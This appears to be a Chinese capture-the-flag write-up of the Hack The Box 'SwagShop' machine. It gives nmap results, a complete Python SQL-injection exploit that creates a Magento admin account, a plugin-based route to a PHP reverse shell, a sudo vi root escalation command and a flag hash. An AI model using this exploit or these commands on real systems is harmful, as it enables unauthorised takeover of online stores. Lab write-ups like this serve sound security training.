10.10.10.140 SwagShop

Nmap扫描，发现开放了ssh和http

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |\_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |\_http-server-header: Apache/2.4.18 (Ubuntu) |\_http-title: Home page Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel

访问http发现存在magento cms

exploitdb上有漏洞利用poc

import requests
import base64
import sys
target = "10.10.10.140"

if not target.startswith("http"):
    target = "http://" + target
if target.endswith("/"):
    target = target\[:-1\]
target\_url = target + "/index.php/admin/Cms\_Wysiwyg/directive/index/"
q="""

SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin\_user WHERE extra IS NOT NULL;
INSERT INTO \`admin\_user\` (\`firstname\`, \`lastname\`,\`email\`,\`username\`,\`password\`,\`created\`,\`lognum\`,\`reload\_acl\_flag\`,\`is\_active\`,\`extra\`,\`rp\_token\`,\`rp\_token\_created\_at\`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO \`admin\_role\` (parent\_id,tree\_level,sort\_order,role\_type,user\_id,role\_name) VALUES (1,2,0,'U',(SELECT user\_id FROM admin\_user WHERE username = '{username}'),'Firstname');

"""

query = q.replace("\\n", "").format(username="forme", password="forme")

pfilter = "popularity\[from\]=0&popularity\[to\]=3&popularity\[field\_expr\]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report\_search\_grid output=getCsvFile}}

r = requests.post(target\_url, 
                  data={"\_\_\_directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"

漏洞利用成功后，目标系统会新建一个管理员帐号，凭据为 forme:forme

后台登录界面为 http://10.10.10.140/index.php/admin/

之后按照常规思路是上传php获得reverse shell，但是这个cms上传图片需要安装adobe flash插件，上传通过flash上传且burp无法拦截，故没办法通过上传图片的方式上传php。

换个思路，google之后发现可以通过安装一个插件启用file system功能。

https://pluginarchive.com/magento/magpleasure\_filesystem

在http://10.10.10.140/downloader/上传安装插件

之后再在任意一个文件中插入php的reverse shell code，访问该文件就能获得reverse shell

之后再在机器上跑一下LinEnum发现SUID配置漏洞。

可以使用sudo以root权限运行/usr/bin/vi /var/www/html/* 命令

先升级成tty+完整shell

sudo /usr/bin/vi /var/www/html/1 -c ':!/bin/sh'

c2b087d66e14a652a3b86a130ac56721